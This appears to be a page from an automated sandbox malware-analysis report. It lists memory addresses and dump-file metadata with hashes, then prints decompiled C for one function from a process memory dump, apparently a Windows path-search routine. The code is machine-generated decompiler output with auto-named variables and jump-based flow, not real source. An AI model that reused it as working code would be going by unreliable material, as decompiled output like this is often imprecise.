                                                0x0098e1b0
                                                0x0098e1b2
                                                0x0098e1b8
                                                0x0098e1b8
                                                0x0098e197
                                                0x0098e1bd
                                                0x0098e1bd
                                                0x00000000
                                                0x0098e1c0
                                                0x0098de80
                                                0x0098de80
                                                0x0098de83
                                                0x0098de85
                                                0x0098de93
                                                0x0098de95
                                                0x0098de9d
                                                0x0098de9d
                                                0x0098dea0
                                                0x0098dea0
                                                0x0098dea5
                                                0x0098dea9
                                                0x0098deb0
                                                0x0098deba
                                                0x0098deba
                                                0x0098deb2
                                                0x0098deb2
                                                0x0098deb2
                                                0x0098deb2
                                                0x0098debc
                                                0x0098debe
                                                0x0098dee3
                                                0x0098dee3
                                                0x0098dee9
                                                0x0098deec
                                                0x0098deec
                                                0x0098deef
                                                0x0098def1
                                                0x0098e144
                                                0x0098e147
                                                0x0098e149
                                                0x0098e14d
                                                0x0098e15e
                                                0x0098e14f
                                                0x0098e14f
                                                0x0098e151
                                                0x0098e154
                                                0x0098e156
                                                0x0098e156
                                                0x0098e156
                                                0x0098e156
                                                0x0098e159
                                                0x0098e159
                                                0x0098e16b
                                                0x0098e16e
                                                0x0098e172
                                                0x0098e175
                                                0x0098e178
                                                0x0098e17a
                                                0x00000000
                                                0x0098e17a
                                                0x0098def7
                                                0x0098def7
                                                0x0098defa
                                                0x0098defc
                                                0x0098df0a
                                                0x0098df0c
                                                0x0098df14
                                                0x0098df14
                                                0x0098df17
                                                0x0098df17
                                                0x0098df19
                                                0x0098df19
                                                0x0098df1c
                                                0x0098df1e
                                                0x0098df53
                                                0x0098df56
                                                0x0098df5a
                                                0x0098df6b
                                                0x0098df5c
                                                0x0098df5c
                                                0x0098df5e
                                                0x0098df61
                                                0x0098df63
                                                0x0098df63
                                                0x0098df63
                                                0x0098df63
                                                0x0098df66
                                                0x0098df66
                                                0x0098df70
                                                0x0098df73
                                                0x0098df77
                                                0x0098e0b2
                                                0x0098e0b2
                                                0x0098e0b6
                                                0x0098e0ba
                                                0x0098e0cb
                                                0x0098e0cb
                                                0x0098e0bc
                                                0x0098e0bc
                                                0x0098e0be
                                                0x0098e0c1
                                                0x0098e0c3
                                                0x0098e0c3
                                                0x0098e0c3
                                                0x0098e0c3
                                                0x0098e0c6
                                                0x0098e0c6
                                                0x0098e0ce
                                                0x0098e0d0
                                                0x0098e107
                                                0x0098e10c
                                                0x0098e111
                                                0x0098e117
                                                0x0098e117
                                                0x0098e113
                                                0x0098e113
                                                0x0098e113
                                                0x0098e0d2
                                                0x0098e0d4
                                                0x0098e0dc
                                                0x0098e0df
                                                0x0098e0e5
                                                0x0098e0e9
                                                0x0098e0ee
                                                0x0098e0f3
                                                0x0098e0fc
                                                0x0098e0f5
                                                0x0098e0f5
                                                0x0098e0f5
                                                0x0098e100
                                                0x0098e100
                                                0x0098e11c
                                                0x0098e120
                                                0x0098e124
                                                0x0098e135
                                                0x0098e135
                                                0x0098e126
                                                0x0098e126
                                                0x0098e128
                                                0x0098e12b
                                                0x0098e12d
                                                0x0098e12d
                                                0x0098e12d
                                                0x0098e12d
                                                0x0098e130
                                                0x0098e130
                                                0x0098e13e
                                                0x00000000
                                                0x0098e13e
                                                0x0098df20
                                                0x0098df22
                                                0x0098df81
                                                0x0098df84
                                                0x0098df86
                                                0x0098df89
                                                0x0098df8c
                                                0x0098df90
                                                0x0098df94
                                                0x00000000
                                                0x0098df94
                                                0x0098df24
                                                0x0098df26
                                                0x0098df9e
                                                0x0098df9e
                                                0x0098dfa1
                                                0x0098dfa3
                                                0x0098dfb6
                                                0x0098dfa5
                                                0x0098dfa5
                                                0x0098dfa7
                                                0x0098dfa7
                                                0x0098dfaa
                                                0x0098dfac
                                                0x0098dfae
                                                0x0098dfae
                                                0x0098dfae
                                                0x0098dfae
                                                0x0098dfb1
                                                0x0098dfb1
                                                0x0098dfb9
                                                0x0098dfbc
                                                0x0098dfbc
                                                0x0098dfbf
                                                0x0098dfc1
                                                0x0098dfcf
                                                0x0098dfd1
                                                0x0098dfe5
                                                0x0098dfe8
                                                0x0098dff2
                                                0x0098dff4
                                                0x0098e00d
                                                0x0098e00f
                                                0x0098e020
                                                0x0098e011
                                                0x0098e011
                                                0x0098e013
                                                0x0098e016
                                                0x0098e018
                                                0x0098e018
                                                0x0098e018
                                                0x0098e018
                                                0x0098e01b
                                                0x0098e01b
                                                0x0098dff6
                                                0x0098e007
                                                0x0098e007
                                                0x0098e007
                                                0x0098e026
                                                0x0098e026
                                                0x0098dfea
                                                0x0098dfed
                                                0x0098dfed
                                                0x0098dfd3
                                                0x0098dfd9
                                                0x0098dfd9
                                                0x0098dfd9
                                                0x0098dfc3
                                                0x0098dfc3
                                                0x0098dfc7
                                                0x0098dfcb
                                                0x0098dfcb
                                                0x0098e033
                                                0x0098e036
                                                0x0098e036
                                                0x0098e039
                                                0x0098e03b
                                                0x0098e049
                                                0x0098e04b
                                                0x0098e05f
                                                0x0098e062
                                                0x0098e06c
                                                0x0098e06e
                                                0x0098e087
                                                0x0098e08b
                                                0x0098e09c
                                                0x0098e08d
                                                0x0098e08d
                                                0x0098e08f
                                                0x0098e092
                                                0x0098e094
                                                0x0098e094
                                                0x0098e094
                                                0x0098e094
                                                0x0098e097
                                                0x0098e097
                                                0x0098e070
                                                0x0098e081
                                                0x0098e081
                                                0x0098e081
                                                0x0098e0a2
                                                0x0098e0a2
                                                0x0098e064
                                                0x0098e067
                                                0x0098e067
                                                0x0098e04d
                                                0x0098e053
                                                0x0098e053
                                                0x0098e053
                                                0x0098e03d
                                                0x0098e03d
                                                0x0098e041
                                                0x0098e045
                                                0x0098e045
                                                0x0098e0a6
                                                0x0098e0a9
                                                0x0098e0ac
                                                0x0098e0b1
                                                0x0098e0b1
                                                0x00000000
                                                0x0098e0b1
                                                0x0098df2b
                                                0x00000000
                                                0x0098df2b
                                                0x0098df0e
                                                0x0098df0e
                                                0x0098df04
                                                0x0098df04
                                                0x0098df04
                                                0x00000000
                                                0x0098df04
                                                0x0098df01
                                                0x0098df01
                                                0x00000000
                                                0x0098dec0
                                                0x0098dec3
                                                0x0098dec6
                                                0x0098decb
                                                0x0098decd
                                                0x00000000
                                                0x00000000
                                                0x0098ded4
                                                0x0098ded8
                                                0x00000000
                                                0x00000000
                                                0x0098dc97
                                                0x0098dc97
                                                0x0098dc9e
                                                0x0098dca8
                                                0x0098dca8
                                                0x0098dca0
                                                0x0098dca0
                                                0x0098dca0
                                                0x0098dca0
                                                0x0098dcaa
                                                0x0098dcac
                                                0x0098dccc
                                                0x0098dccc
                                                0x0098dcd0
                                                0x0098dcd2
                                                0x0098dd60
                                                0x0098dd63
                                                0x0098dd67
                                                0x0098dd78
                                                0x0098dd69
                                                0x0098dd69
                                                0x0098dd6b
                                                0x0098dd6e
                                                0x0098dd70
                                                0x0098dd70
                                                0x0098dd70
                                                0x0098dd70
                                                0x0098dd73
                                                0x0098dd73
                                                0x0098dd7b
                                                0x0098dd7e
                                                0x0098dd80
                                                0x0098dd9a
                                                0x0098dd82
                                                0x0098dd92
                                                0x0098dd92
                                                0x0098dd9c
                                                0x0098dd9e
                                                0x0098df40
                                                0x0098df40
                                                0x00000000
                                                0x0098dda4
                                                0x0098dda4
                                                0x0098dda8
                                                0x0098de72
                                                0x0098de75
                                                0x0098de75
                                                0x00000000
                                                0x0098de75
                                                0x0098ddae
                                                0x0098ddae
                                                0x0098ddb5
                                                0x0098ddb5
                                                0x0098ddb8
                                                0x0098de55
                                                0x0098de5a
                                                0x0098de62
                                                0x0098de66
                                                0x0098de6a
                                                0x0098de6e
                                                0x00000000
                                                0x0098de6e
                                                0x0098ddbe
                                                0x0098ddbe
                                                0x0098ddc1
                                                0x0098ddc7
                                                0x0098ddc9
                                                0x0098ddd0
                                                0x0098ddd0
                                                0x0098ddd0
                                                0x00000000
                                                0x0098ddd0
                                                0x0098ddcb
                                                0x0098ddcb
                                                0x00000000
                                                0x0098ddcb
                                                0x0098dd9e
                                                0x0098dcd8
                                                0x0098dcdb
                                                0x0098dcdf
                                                0x0098dce8
                                                0x0098dce8
                                                0x0098dce8
                                                0x0098dcea
                                                0x0098dcee
                                                0x0098dd09
                                                0x0098dd0d
                                                0x0098dd0d
                                                0x0098dd11
                                                0x0098dd14
                                                0x0098dd16
                                                0x0098dd30
                                                0x0098dd18
                                                0x0098dd28
                                                0x0098dd28
                                                0x0098dd32
                                                0x0098dd34
                                                0x00000000
                                                0x0098dd3a
                                                0x0098dd3a
                                                0x0098dd3e
                                                0x00000000
                                                0x00000000
                                                0x0098dd40
                                                0x0098dd44
                                                0x0098dd55
                                                0x0098dd46
                                                0x0098dd46
                                                0x0098dd48
                                                0x0098dd4b
                                                0x0098dd4d
                                                0x0098dd4d
                                                0x0098dd4d
                                                0x0098dd4d
                                                0x0098dd50
                                                0x0098dd50
                                                0x0098dd58
                                                0x00000000
                                                0x0098dd58
                                                0x0098dcf0
                                                0x0098dcf0
                                                0x0098dcf3
                                                0x0098dcf9
                                                0x0098dcfb
                                                0x0098df34
                                                0x0098df34
                                                0x00000000
                                                0x0098df34
                                                0x0098dd01
                                                0x00000000
                                                0x0098dd01
                                                0x0098dcae
                                                0x0098dcb1
                                                0x0098dcb4
                                                0x0098dcb9
                                                0x0098dcbb
                                                0x00000000
                                                0x00000000
                                                0x0098dcc2
                                                0x0098dcc6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0098dcc6
                                                0x0098dcac
                                                0x0098debe
                                                0x0098de97
                                                0x0098de97
                                                0x0098de8d
                                                0x0098de8d
                                                0x0098de8d
                                                0x00000000
                                                0x0098de8d
                                                0x0098de8a
                                                0x0098de8a
                                                0x00000000
                                                0x0098de8a
                                                0x0098ddd8
                                                0x0098ddd8
                                                0x0098ddde
                                                0x0098dde0
                                                0x0098dde2
                                                0x00000000
                                                0x00000000
                                                0x0098dde8
                                                0x0098dde8
                                                0x00000000
                                                0x0098dde8
                                                0x0098dc0b
                                                0x0098dc0b
                                                0x0098dc10
                                                0x00000000
                                                0x00000000
                                                0x0098dc14
                                                0x0098dc19
                                                0x0098dc1b
                                                0x00000000
                                                0x0098dc1d
                                                0x0098dc1d
                                                0x0098e1c1
                                                0x00000000
                                                0x0098e1c1
                                                0x0098dc1b

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e775c2b69000130418affd35076308cb67d3651445316e7752e023037b04c2ab
                                                • Instruction ID: 0b5d2bb4468542e1020cb24749bab5109e8e8ddcc067870f2ca25c4df501a4b2
                                                • Opcode Fuzzy Hash: e775c2b69000130418affd35076308cb67d3651445316e7752e023037b04c2ab
                                                • Instruction Fuzzy Hash: E412E0702192519FDB29EF29C494B76B7E4BF05300F14889AE8D68F7D2D338E851EB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0092286D, Relevance: .5, Instructions: 460COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 56%
                                                			E0092286D(signed int _a4, signed short _a8, signed short* _a12, signed int _a16, intOrPtr* _a20, signed int _a24, signed int _a28, signed int _a32, intOrPtr* _a36) {
				signed int _v8;
				char _v528;
				signed int _v532;
				signed int _v534;
				short _v536;
				signed int _v540;
				signed int _v544;
				signed short _v548;
				signed int _v552;
				signed int _v556;
				intOrPtr* _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed short _v588;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t159;
				intOrPtr* _t164;
				signed int _t171;
				signed int _t172;
				signed short _t175;
				signed short _t176;
				signed short _t178;
				signed int _t180;
				signed int _t194;
				signed short* _t199;
				signed short* _t201;
				signed int _t202;
				signed short _t203;
				signed int _t206;
				signed int _t207;
				signed short _t212;
				void* _t214;
				signed short _t215;
				signed int _t217;
				signed int _t225;
				signed int _t229;
				void* _t231;
				short* _t235;
				signed short _t236;
				signed int _t237;
				signed short _t240;
				signed short* _t243;
				signed int _t247;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed short _t260;
				signed short _t261;
				signed int _t262;
				signed int _t263;
				signed int _t267;
				short* _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed short _t273;
				signed int* _t278;
				signed short _t282;
				signed int _t286;
				signed short* _t287;
				signed int _t288;
				signed int _t289;
				unsigned int _t290;
				signed int _t292;
				short* _t293;
				signed short _t302;
				signed int _t303;
				void* _t304;
				void* _t306;

				_t159 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t159 ^ _t303;
				_t252 = _a32;
				_v544 = _v544 & 0x00000000;
				_v540 = _v540 & 0x00000000;
				_v548 = _a8;
				_v536 = 0;
				_v560 = _a20;
				_v534 = 0x208;
				_t250 = _a24;
				_v556 = _a28;
				_t164 = _a36;
				_t288 = _a16;
				_v532 =  &_v528;
				_t278 = _v556;
				_t287 = _a12;
				_v576 = _t288;
				_v580 = _t250;
				_v572 = _t252;
				_v568 = _t164;
				if(_t278 != 0) {
					 *_t278 =  *_t278 & 0x00000000;
				}
				_t279 = 0;
				if(_t164 != 0) {
					 *_t164 = 0;
				}
				if(_t252 != _t279) {
					 *_t252 = _t279;
				}
				if(_t250 != _t279) {
					 *_t250 = 0;
					 *(_t250 + 2) = 0;
					 *(_t250 + 4) = _t279;
				}
				if((_a4 & 0xfffffff8) != 0 || _v548 == _t279 || _t287 == _t279) {
					L87:
					_t289 = 0xc000000d;
					goto L48;
				} else {
					if(_v560 == _t279 || _t250 == _t279) {
						L11:
						_t171 = E008FE825(_t287);
						_v564 = _t171;
						if((_a4 & 0x00000002) == 0) {
							L84:
							__eflags = _t171 - 5;
							if(__eflags != 0) {
								L38:
								_t172 = E0090A7EB(_t252, _t279, __eflags, _t287, 1);
								__eflags = _t172;
								if(_t172 != 0) {
									_push(_v568);
									_push( &_v564);
									_push(0);
									_push(_v572);
									_push(_v556);
									_push(_t250);
									_push(_v560);
									_push(_t287);
									L46:
									_t289 = E0090A524();
									__eflags = _t289;
									if(_t289 < 0) {
										L48:
										__eflags = _v532;
										if(_v532 != 0) {
											__eflags = _v532 -  &_v528;
											if(_v532 !=  &_v528) {
												E008FE1C6( &_v536);
											}
										}
										L50:
										__eflags = _v8 ^ _t303;
										return E008FE1B4(_t289, _t250, _v8 ^ _t303, _t279, _t287, _t289);
									}
									L47:
									_t289 = 0;
									__eflags = 0;
									goto L48;
								}
								__eflags = _t288;
								if(_t288 == 0) {
									L56:
									_t289 = 0xc000000f;
									goto L48;
								}
								_t175 =  *_t288 & 0x0000ffff;
								__eflags = _t175;
								if(_t175 == 0) {
									goto L56;
								}
								__eflags = _a4 & 0x00000004;
								_t250 = _t175 & 0x0000ffff;
								if((_a4 & 0x00000004) == 0) {
									_t176 =  *_t287 & 0x0000ffff;
									__eflags = _t176;
									if(_t176 == 0) {
										goto L42;
									}
									_t260 = _t287[2];
									_t199 = _t260 + ((_t176 & 0x0000ffff) >> 1) * 2;
									while(1) {
										__eflags = _t199 - _t260;
										if(_t199 <= _t260) {
											goto L42;
										}
										_t199 = _t199;
										_t279 =  *_t199 & 0x0000ffff;
										__eflags = _t279 - 0x5c;
										if(_t279 == 0x5c) {
											goto L42;
										} else {
											__eflags = _t279 - 0x2f;
											if(_t279 == 0x2f) {
												goto L42;
											}
											__eflags = _t279 - 0x2e;
											if(_t279 == 0x2e) {
												goto L56;
											}
											continue;
										}
										L103:
										_t289 = 0xc0000106;
										goto L48;
									}
								}
								L42:
								_t178 = (_t250 & 0x0000ffff) + ( *_t287 & 0x0000ffff) + 2;
								__eflags = _t178 - 0xfffe;
								if(_t178 > 0xfffe) {
									goto L103;
								}
								__eflags = _t178 - (_v534 & 0x0000ffff);
								if(_t178 > (_v534 & 0x0000ffff)) {
									_v534 = _t178;
									_t180 =  *0x8fe6f4(_t178 & 0x0000ffff);
									_v532 = _t180;
									__eflags = _t180;
									if(_t180 != 0) {
										goto L44;
									}
									L105:
									_t289 = 0xc0000017;
									goto L50;
								}
								L44:
								E008F2340(_v532, _t287[2],  *_t287 & 0x0000ffff);
								E008F2340(_v532 + (( *_t287 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t288 + 4)),  *_t288 & 0x0000ffff);
								_t279 = _v532;
								 *((short*)(_v532 + (( *_t288 & 0x0000ffff) + ( *_t287 & 0x0000ffff) >> 1) * 2)) = 0;
								_v536 =  *_t288 +  *_t287;
								_t194 = E0090A7EB(0, _v532, __eflags,  &_v536, 1);
								__eflags = _t194;
								if(_t194 == 0) {
									goto L56;
								}
								L45:
								_push(_v568);
								_push( &_v564);
								_push(0);
								_push(_v572);
								_push(_v556);
								_push(_v580);
								_push(_v560);
								_push( &_v536);
								goto L46;
							}
							L15:
							if((_a4 & 0x00000001) == 0) {
								L19:
								if(_t288 == 0) {
									L27:
									_t201 = _v548;
									_t261 =  *_t201 & 0x0000ffff;
									_v552 = _t261;
									if(_t261 == 0) {
										_t262 = _v544;
										goto L63;
									} else {
										_t282 = _t201[2];
										_t251 = _v544;
										_t235 = _t282 + ((_t261 & 0x0000ffff) >> 1) * 2;
										while(1) {
											L29:
											_t269 = _t235;
											while(_t235 > _t282) {
												_t235 = _t235;
												if( *_t235 != 0x3b) {
													continue;
												}
												_t302 = (_t269 - _t235 >> 0x00000001) - 0x00000001 & 0x0000ffff;
												if(_t302 != 0) {
													_t272 =  *(_t269 - 2) & 0x0000ffff;
													if(_t272 != 0x5c && _t272 != 0x2f) {
														_t302 = _t302 + 1;
													}
												}
												_t271 = _t302 & 0x0000ffff;
												if(_t271 > _t251) {
													_t251 = _t271;
												}
												goto L29;
											}
											_t236 = _t269 - _t235 >> 0x00000001 & 0x0000ffff;
											__eflags = _t236;
											if(_t236 != 0) {
												_t270 =  *(_t269 - 2) & 0x0000ffff;
												__eflags = _t270 - 0x5c;
												if(_t270 != 0x5c) {
													__eflags = _t270 - 0x2f;
													if(_t270 != 0x2f) {
														_t236 = _t236 + 1;
														__eflags = _t236;
													}
												}
											}
											_t237 = _t236 & 0x0000ffff;
											__eflags = _t237 - _t251;
											if(_t237 > _t251) {
												_t250 = _t237;
											}
											_t262 = _t250 + _t250;
											L63:
											_t202 = _v540 & 0x0000ffff;
											_t279 = ( *_t287 & 0x0000ffff) + _t202;
											_v584 = _t202;
											_t203 = ( *_t287 & 0x0000ffff) + _t202 + _t262 + 2;
											_v588 = _t203;
											__eflags = _t203 - 0xfffe;
											if(_t203 > 0xfffe) {
												goto L103;
											}
											_t250 =  *(_v548 + 4);
											_t206 = (_v552 & 0x0000ffff) >> 1;
											__eflags = _t206;
											_t207 = _t250 + _t206 * 2;
											_v544 = _t207;
											while(1) {
												__eflags = _t250 - _t207;
												if(_t250 >= _t207) {
													goto L56;
												}
												__eflags = _t250 - _v544;
												_t263 = _t250;
												while(1) {
													_v540 = _t263;
													if(__eflags == 0) {
														break;
													}
													__eflags =  *_t263 - 0x3b;
													if( *_t263 == 0x3b) {
														break;
													}
													_t263 = _t263 + 2;
													__eflags = _t263 - _v544;
												}
												_t212 = (_t263 - _t250 >> 0x00000001) + (_t263 - _t250 >> 0x00000001) & 0x0000ffff;
												_v548 = _t212;
												_v552 = _t212 & 0x0000ffff;
												__eflags = _t212;
												if(_t212 != 0) {
													_t267 =  *(_t263 - 2) & 0x0000ffff;
													__eflags = _t267 - 0x5c;
													if(_t267 != 0x5c) {
														__eflags = _t267 - 0x2f;
														if(_t267 != 0x2f) {
															_t212 = _t212 + 2;
															__eflags = _t212;
															_v548 = _t212;
														}
													}
												}
												_t279 = _v534 & 0x0000ffff;
												_t214 = (_t212 & 0x0000ffff) + ( *_t287 & 0x0000ffff) + _v584;
												_t266 = _t214 + 2;
												__eflags = (_v534 & 0x0000ffff) - _t214 + 2;
												if((_v534 & 0x0000ffff) < _t214 + 2) {
													_t266 =  &_v528;
													__eflags = _v532 -  &_v528;
													if(_v532 !=  &_v528) {
														L112:
														_t289 = 0xc00000e5;
														goto L48;
													}
													__eflags = _t214 - 0xfffc;
													if(_t214 > 0xfffc) {
														goto L112;
													}
													_t215 = _v588;
													_v534 = _t215;
													_t217 =  *0x8fe6f4(_t215 & 0x0000ffff);
													_v532 = _t217;
													__eflags = _t217;
													if(_t217 != 0) {
														goto L75;
													}
													goto L105;
												} else {
													L75:
													_t290 = _v552 & 0x0000ffff;
													E008F2340(_v532, _t250, _t290);
													_t306 = _t304 + 0xc;
													__eflags = _v548;
													_t292 = _v532 + (_t290 >> 1) * 2;
													if(_v548 != 0) {
														__eflags = _v552 - _v548;
														if(_v552 != _v548) {
															_t231 = 0x5c;
															 *_t292 = _t231;
															_t292 = _t292 + 2;
															__eflags = _t292;
														}
													}
													E008F2340(_t292, _t287[2],  *_t287 & 0x0000ffff);
													_t250 = _v576;
													_t304 = _t306 + 0xc;
													_t293 = _t292 + (( *_t287 & 0x0000ffff) >> 1) * 2;
													__eflags = _t250;
													if(_t250 != 0) {
														E008F2340(_t293,  *(_t250 + 4),  *_t250 & 0x0000ffff);
														_t304 = _t304 + 0xc;
														_t229 = ( *_t250 & 0x0000ffff) >> 1;
														__eflags = _t229;
														_t293 = _t293 + _t229 * 2;
													}
													 *_t293 = 0;
													_v536 = (_t293 - _v532 >> 1) + (_t293 - _v532 >> 1);
													_t225 = E0090A8C2(_t266, _v532, 0);
													__eflags = _t225;
													if(_t225 != 0) {
														goto L45;
													} else {
														_t207 = _v544;
														_t250 = _v540;
														__eflags = _t250 - _t207;
														if(_t250 != _t207) {
															_t250 = _t250 + 2;
														}
														continue;
													}
												}
											}
											goto L56;
										}
									}
								}
								_v540 =  *_t288 & 0x0000ffff;
								_t240 =  *_t287 & 0x0000ffff;
								if(_t240 != 0) {
									_t273 = _t287[2];
									_t243 = _t273 + ((_t240 & 0x0000ffff) >> 1) * 2;
									while(_t243 > _t273) {
										_t243 = _t243;
										_t286 =  *_t243 & 0x0000ffff;
										if(_t286 == 0x5c || _t286 == 0x2f) {
											goto L27;
										} else {
											if(_t286 != 0x2e) {
												continue;
											} else {
												_v576 = _v576 & 0x00000000;
												_v540 = _v540 & 0x00000000;
												goto L27;
											}
										}
									}
								}
								goto L27;
							}
							_v552 = _v552 & 0x00000000;
							_t289 = E008FF02A(1, _t287, _t288, _v560, _t250,  &_v552, 0, _v572, _v568);
							if(_t289 >= 0) {
								_t247 = _v556;
								__eflags = _t247;
								if(_t247 != 0) {
									 *_t247 = _v552;
								}
								goto L47;
							}
							if(_t289 != 0xc0150008) {
								goto L48;
							} else {
								_t288 = _v576;
								goto L19;
							}
						}
						if(_t171 != 5) {
							goto L38;
						}
						_t279 =  *_t287 & 0x0000ffff;
						if(_t279 < 4) {
							goto L15;
						}
						_t248 = _t287[2];
						if( *_t248 == 0x2e) {
							_t252 =  *(_t248 + 2) & 0x0000ffff;
							__eflags = _t252 - 0x5c;
							if(_t252 == 0x5c) {
								L95:
								_t171 = 0;
								_v564 = 0;
								goto L84;
							}
							__eflags = _t252 - 0x2f;
							if(_t252 == 0x2f) {
								goto L95;
							}
							__eflags = _t252 - 0x2e;
							if(_t252 != 0x2e) {
								goto L15;
							}
							__eflags = _t279 - 6;
							if(_t279 < 6) {
								goto L15;
							}
							_t249 =  *(_t248 + 4) & 0x0000ffff;
							__eflags = _t249 - 0x5c;
							if(__eflags == 0) {
								L94:
								_v564 = _v564 & 0x00000000;
								goto L38;
							}
							__eflags = _t249 - 0x2f;
							if(__eflags != 0) {
								goto L15;
							}
							goto L94;
						}
						goto L15;
					} else {
						__eflags = _v556 - _t279;
						if(_v556 != _t279) {
							goto L11;
						}
						goto L87;
					}
				}
			}
















































































                                                0x00922878
                                                0x0092287f
                                                0x00922885
                                                0x00922888
                                                0x0092288f
                                                0x00922898
                                                0x009228a1
                                                0x009228ad
                                                0x009228b6
                                                0x009228be
                                                0x009228c7
                                                0x009228cd
                                                0x009228d1
                                                0x009228d4
                                                0x009228da
                                                0x009228e1
                                                0x009228e4
                                                0x009228ea
                                                0x009228f0
                                                0x009228f6
                                                0x009228fe
                                                0x00923595
                                                0x00923595
                                                0x00922904
                                                0x00922908
                                                0x0092290a
                                                0x0092290a
                                                0x0092290e
                                                0x00922910
                                                0x00922910
                                                0x00922914
                                                0x0092359f
                                                0x009235a2
                                                0x009235a6
                                                0x009235a6
                                                0x00922921
                                                0x00941191
                                                0x00941191
                                                0x00000000
                                                0x0092293b
                                                0x00922941
                                                0x0092294b
                                                0x0092294c
                                                0x00922955
                                                0x0092295b
                                                0x00941178
                                                0x00941178
                                                0x0094117b
                                                0x00922a7d
                                                0x00922a80
                                                0x00922a85
                                                0x00922a87
                                                0x0092356d
                                                0x00923579
                                                0x0092357a
                                                0x0092357c
                                                0x00923582
                                                0x00923588
                                                0x00923589
                                                0x0092358f
                                                0x00922b69
                                                0x00922b6e
                                                0x00922b70
                                                0x00922b72
                                                0x00922b76
                                                0x00922b76
                                                0x00922b7d
                                                0x00922b85
                                                0x00922b8b
                                                0x0094e87f
                                                0x0094e87f
                                                0x00922b8b
                                                0x00922b91
                                                0x00922b98
                                                0x00922ba1
                                                0x00922ba1
                                                0x00922b74
                                                0x00922b74
                                                0x00922b74
                                                0x00000000
                                                0x00922b74
                                                0x00922a8d
                                                0x00922a8f
                                                0x00933bcb
                                                0x00933bcb
                                                0x00000000
                                                0x00933bcb
                                                0x00922a95
                                                0x00922a98
                                                0x00922a9b
                                                0x00000000
                                                0x00000000
                                                0x00922aa1
                                                0x00922aa5
                                                0x00922aa8
                                                0x0094e79e
                                                0x0094e7a1
                                                0x0094e7a4
                                                0x00000000
                                                0x00000000
                                                0x0094e7aa
                                                0x0094e7b2
                                                0x0094e7da
                                                0x0094e7da
                                                0x0094e7dc
                                                0x00000000
                                                0x00000000
                                                0x0094e7b8
                                                0x0094e7b9
                                                0x0094e7bc
                                                0x0094e7c0
                                                0x00000000
                                                0x0094e7c6
                                                0x0094e7c6
                                                0x0094e7ca
                                                0x00000000
                                                0x00000000
                                                0x0094e7d0
                                                0x0094e7d4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094e7d4
                                                0x0094e7e4
                                                0x0094e7e4
                                                0x00000000
                                                0x0094e7e4
                                                0x0094e7da
                                                0x00922aae
                                                0x00922ab4
                                                0x00922ab8
                                                0x00922abd
                                                0x00000000
                                                0x00000000
                                                0x00922aca
                                                0x00922acc
                                                0x0094e7ee
                                                0x0094e7f9
                                                0x0094e7ff
                                                0x0094e805
                                                0x0094e807
                                                0x00000000
                                                0x00000000
                                                0x0094e80d
                                                0x0094e80d
                                                0x00000000
                                                0x0094e80d
                                                0x00922ad2
                                                0x00922adf
                                                0x00922afa
                                                0x00922b05
                                                0x00922b11
                                                0x00922b1e
                                                0x00922b2e
                                                0x00922b33
                                                0x00922b35
                                                0x00000000
                                                0x00000000
                                                0x00922b3b
                                                0x00922b3b
                                                0x00922b47
                                                0x00922b48
                                                0x00922b4a
                                                0x00922b56
                                                0x00922b5c
                                                0x00922b62
                                                0x00922b68
                                                0x00000000
                                                0x00922b68
                                                0x00922980
                                                0x00922984
                                                0x009229ce
                                                0x009229d0
                                                0x00922a17
                                                0x00922a17
                                                0x00922a1d
                                                0x00922a20
                                                0x00922a29
                                                0x00941186
                                                0x00000000
                                                0x00922a2f
                                                0x00922a2f
                                                0x00922a32
                                                0x00922a3d
                                                0x00922a40
                                                0x00922a40
                                                0x00922a40
                                                0x00922a42
                                                0x00922a4b
                                                0x00922a50
                                                0x00000000
                                                0x00000000
                                                0x00922a59
                                                0x00922a5f
                                                0x00922a61
                                                0x00922a69
                                                0x00922a71
                                                0x00922a71
                                                0x00922a69
                                                0x00922a72
                                                0x00922a77
                                                0x00922a79
                                                0x00922a79
                                                0x00000000
                                                0x00922a77
                                                0x00933dbe
                                                0x00933dc1
                                                0x00933dc4
                                                0x00933dc6
                                                0x00933dca
                                                0x00933dce
                                                0x00933dd0
                                                0x00933dd4
                                                0x00933dd6
                                                0x00933dd6
                                                0x00933dd6
                                                0x00933dd4
                                                0x00933dce
                                                0x00933dd7
                                                0x00933dda
                                                0x00933ddc
                                                0x00941171
                                                0x00941171
                                                0x00933de2
                                                0x00933de5
                                                0x00933de5
                                                0x00933def
                                                0x00933df1
                                                0x00933df7
                                                0x00933dfb
                                                0x00933e01
                                                0x00933e06
                                                0x00000000
                                                0x00000000
                                                0x00933e12
                                                0x00933e1c
                                                0x00933e1c
                                                0x00933e1e
                                                0x00933e21
                                                0x00933e27
                                                0x00933e27
                                                0x00933e29
                                                0x00000000
                                                0x00000000
                                                0x00933e2f
                                                0x00933e35
                                                0x00933e37
                                                0x00933e37
                                                0x00933e3d
                                                0x00000000
                                                0x00000000
                                                0x00933e3f
                                                0x00933e43
                                                0x00000000
                                                0x00000000
                                                0x00933e46
                                                0x00933e47
                                                0x00933e47
                                                0x00933e57
                                                0x00933e5d
                                                0x00933e63
                                                0x00933e69
                                                0x00933e6c
                                                0x00933e6e
                                                0x00933e72
